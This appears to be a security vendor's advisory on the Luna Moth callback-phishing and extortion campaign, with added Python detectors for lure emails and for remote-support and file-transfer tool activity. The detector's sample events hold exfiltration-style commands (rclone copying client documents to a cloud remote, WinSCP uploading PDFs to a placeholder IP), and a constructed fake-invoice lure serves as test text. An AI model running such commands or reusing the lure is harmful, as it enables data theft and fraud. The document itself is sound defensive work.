Fake Subscription Invoices

Beware of fake subscription invoices – they could lead to data theft and extortion.

Threat Actor: Luna Moth

  • A hacker group known as Luna Moth has been using social engineering and trusted software to steal sensitive data and extort money from small businesses.

  • The group does not deploy ransomware. Instead it targets individual employees, persuades them to call a phone number, and talks them into installing a legitimate remote access tool.

Threat Landscape

Phase I

  • Callback phishing, also called telephone-oriented attack delivery (TOAD), is a social engineering attack in which the attacker speaks with the target directly, which gives it a higher success rate than phishing that relies on a link alone. The scammers email fake subscription invoices that appear to come from legitimate businesses, claiming the recipient has subscribed to a service and that payment will be taken automatically from the payment method on file. The email contains no clickable links and no malicious attachment, so link-scanning and attachment-sandboxing controls have nothing to trigger on. Instead it carries a phone number the recipient is told to call to dispute the charge, and a confirmation number the threat actors use to identify the victim when the call comes in. The attached PDF invoice repeats the same phone number and confirmation number.
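
The lure described above has no URL and no executable attachment, which is exactly what most mail filters key on. The following is an added example, not code from the original post or from Ambit or Unit 42, showing what a triage heuristic for such messages can still key on: a callback number, billing vocabulary, an instruction to call, and a confirmation number to quote. The two messages are constructed, and the vocabulary lists, regexes and threshold are assumptions that would need tuning against real mail flow.

```python
"""Heuristic triage for callback-phishing (TOAD) invoice lures.

Added example, not code from the original post. The two messages below
are CONSTRUCTED; the vocabulary lists, regexes and threshold are
assumptions that would need tuning against real mail flow.
"""
import re

# North American phone number, with optional country code. Lookarounds
# stop it matching inside longer digit runs such as confirmation numbers.
PHONE_RE = re.compile(
    r"(?<!\d)(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}(?!\d)"
)
URL_RE = re.compile(r"https?://|\bwww\.", re.IGNORECASE)
# "Confirmation number: XYZ-123" style reference the caller is asked to quote.
REF_RE = re.compile(
    r"\b(confirmation|invoice|order|reference)\s*(?:number|no\.?|#|id)?\s*[:#]?\s*[a-z0-9-]{6,}\b",
    re.IGNORECASE,
)
CALLBACK_RE = re.compile(r"\b(call|dispute|cancel|billing department|support line)\b")
BILLING_TERMS = ("subscription", "renew", "invoice", "charged", "payment method", "billed")

THRESHOLD = 6  # ASSUMED cut-off for routing a message to manual review


def score_callback_phish(subject, body, attachment_names=()):
    """Score one message; return (score, reasons). Higher means more lure-like."""
    text = f"{subject}\n{body}"
    low = text.lower()
    score, reasons = 0, []

    phones = PHONE_RE.findall(text)
    if phones:
        score += 2
        reasons.append(f"{len(phones)} phone number(s) in body")

    has_url = bool(URL_RE.search(text))
    if not has_url:
        score += 1
        reasons.append("no URL: link rewriting and URL reputation have nothing to inspect")

    hits = [t for t in BILLING_TERMS if t in low]
    if len(hits) >= 2:
        score += 2
        reasons.append("billing vocabulary: " + ", ".join(hits))

    if phones and CALLBACK_RE.search(low):
        score += 2
        reasons.append("recipient is told to call the number to dispute or cancel")

    if REF_RE.search(text):
        score += 1
        reasons.append("confirmation/reference number for the operator to look up")

    pdfs = [a for a in attachment_names if a.lower().endswith(".pdf")]
    if pdfs and not has_url:
        score += 1
        reasons.append("PDF attachment with no links, repeating the invoice details")

    return score, reasons


def is_suspected_callback_phish(subject, body, attachment_names=()):
    return score_callback_phish(subject, body, attachment_names)[0] >= THRESHOLD


# CONSTRUCTED lure modelled on the fake-invoice pattern described in the post.
LURE_SUBJECT = "Your ProtectMyPC Premium subscription has renewed - Invoice"
LURE_BODY = (
    "Thank you for your purchase. Your ProtectMyPC Premium annual subscription "
    "has been renewed and $349.99 will be charged to the payment method on file "
    "within 24 hours. If you did not authorize this renewal or wish to cancel, "
    "call our billing department at 1-800-555-0142.\n"
    "Confirmation number: PMP-48213-77"
)
LURE_ATTACHMENTS = ("Invoice_PMP-48213-77.pdf",)

# CONSTRUCTED benign message: a link, no phone number, no billing language.
BENIGN_SUBJECT = "Your weekly product update"
BENIGN_BODY = (
    "Read this month's release notes at https://www.example.com/releases. "
    "Questions? Reply to this email."
)

if __name__ == "__main__":
    for label, args in (("lure", (LURE_SUBJECT, LURE_BODY, LURE_ATTACHMENTS)),
                        ("benign", (BENIGN_SUBJECT, BENIGN_BODY))):
        s, why = score_callback_phish(*args)
        print(f"{label}: score={s} flagged={s >= THRESHOLD}")
        for r in why:
            print("  -", r)
```

Legitimate vendor invoices also carry phone numbers and billing language, so a score like this is for routing a message to a verification step (for example, a finance contact confirming the charge out of band), not for blocking mail outright.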

Phase II

  • When the victim called, they were connected to a threat actor who sent them a remote assistance invitation for Zoho Assist, a legitimate remote support tool. Once the victim joined the session, the attacker took control of the keyboard and mouse, gained access to the clipboard, and blacked out the victim's screen to conceal what they were doing.

Phase III

  • To keep access after the support session ended, the threat actor installed Syncro, another legitimate remote support tool, for persistence, and the open source file transfer tools Rclone or WinSCP to exfiltrate data. None of this requires administrative privileges; the whole chain runs within the user's own security context. The attacker then searched for sensitive data, downloaded it, and followed up with an email threatening to sell or leak the data unless a ransom was paid.
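
Because every tool in this phase is legitimate software running as the logged-in user, signature-based antivirus has nothing to flag; the useful telemetry is process creation. The following is an added example, not code from the original post or from Ambit or Unit 42, showing how process-creation events could be triaged for this tool chain: an unapproved remote support tool, a file transfer tool, an rclone transfer to a cloud remote, and any executable launched from a user-writable path. The events are constructed to resemble parsed Sysmon Event ID 1 fields, and the tool substrings, installer file names and allowlist are illustrative assumptions; real binary names vary by version and must be checked against your own software inventory.

```python
"""Triage of process-creation events for the Luna Moth tool chain.

Added example, not code from the original post or from any vendor. The
events below are CONSTRUCTED to look like parsed Sysmon Event ID 1 / EDR
process-creation records. Tool markers, the allowlist and the installer
file names are illustrative ASSUMPTIONS; binary names vary by version.
"""
import re

# Substrings for the remote-support and file-transfer tools named in the
# write-up, matched against image path plus command line (lower-cased).
REMOTE_SUPPORT_MARKERS = ("zoho", "syncro")
FILE_TRANSFER_MARKERS = ("rclone", "winscp")

# Remote-access tooling the organisation actually sanctions (ASSUMED).
APPROVED_IMAGES = {r"c:\program files\approvedrmm\agent.exe"}

# Executable launched from a location a non-admin user can write to. The
# chain needs no admin rights, so this is where its binaries tend to land.
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\temp\\",
    re.IGNORECASE,
)

# rclone copy/sync/move with a "<remote>:<path>" argument. Two or more
# characters before the colon so a bare drive letter (c:\...) is not a remote.
RCLONE_XFER_RE = re.compile(r"\b(copy|sync|move)\b.*?\s([a-z0-9_-]{2,}):\S*")


def triage_event(ev):
    """Return the list of rule names fired by one process-creation event."""
    image = ev["image"].lower()
    cmdline = ev.get("command_line", "").lower()
    user = ev.get("user", "").lower()
    haystack = f"{image} {cmdline}"
    fired = []

    if image in APPROVED_IMAGES:
        return fired  # sanctioned tooling: nothing to report

    if any(m in haystack for m in REMOTE_SUPPORT_MARKERS):
        fired.append("unapproved_remote_support_tool")

    if any(m in haystack for m in FILE_TRANSFER_MARKERS):
        fired.append("file_transfer_tool")
        if "rclone" in haystack and RCLONE_XFER_RE.search(cmdline):
            fired.append("rclone_transfer_to_remote")

    if USER_WRITABLE_RE.search(image) and not user.endswith("system"):
        fired.append("exec_from_user_writable_path")

    return fired


def triage(events):
    """Map event id -> fired rules, keeping only events that fired something."""
    alerts = {}
    for ev in events:
        rules = triage_event(ev)
        if rules:
            alerts[ev["id"]] = rules
    return alerts


# CONSTRUCTED events. Paths, user names and the 203.0.113.10 address are
# documentation placeholders, not observed indicators.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "command_line": r'rclone.exe copy "C:\Users\jdoe\Documents\Clients" mega:backup --transfers 8',
     "user": r"CORP\jdoe"},
    {"id": 2, "image": r"C:\Users\jdoe\Downloads\SyncroSetup.exe",  # ASSUMED installer name
     "command_line": r"SyncroSetup.exe /S", "user": r"CORP\jdoe"},
    {"id": 3, "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "command_line": r'WinSCP.exe /command "open sftp://upload@203.0.113.10" "put C:\Users\jdoe\Documents\*.pdf"',
     "user": r"CORP\jdoe"},
    {"id": 4, "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs", "user": r"NT AUTHORITY\SYSTEM"},
    {"id": 5, "image": r"C:\Program Files\ApprovedRMM\agent.exe",
     "command_line": "agent.exe --service", "user": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The allowlist is the important part: the same rule that catches an attacker's Syncro install would also fire on the help desk's own remote support tool unless that tool is explicitly approved, and an approved tool launched from a user's Downloads folder instead of its installed location still deserves a look.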

Conclusion

Unit 42 researchers found that the group initially targeted small- to medium-sized businesses in the legal industry, but companies in the retail sector are now also being victimized.

Organizations should invest in:

  • Cybersecurity awareness training programs that specifically cover unexpected invoices, requests to get on a phone call, and requests to install software.

  • Cybersecurity tools designed to detect and prevent anomalous activity (for example, installing unrecognized software or exfiltrating sensitive data).

To discuss how Ambit can help protect your business from cyber threats, contact us and a representative will reach out within the hour.
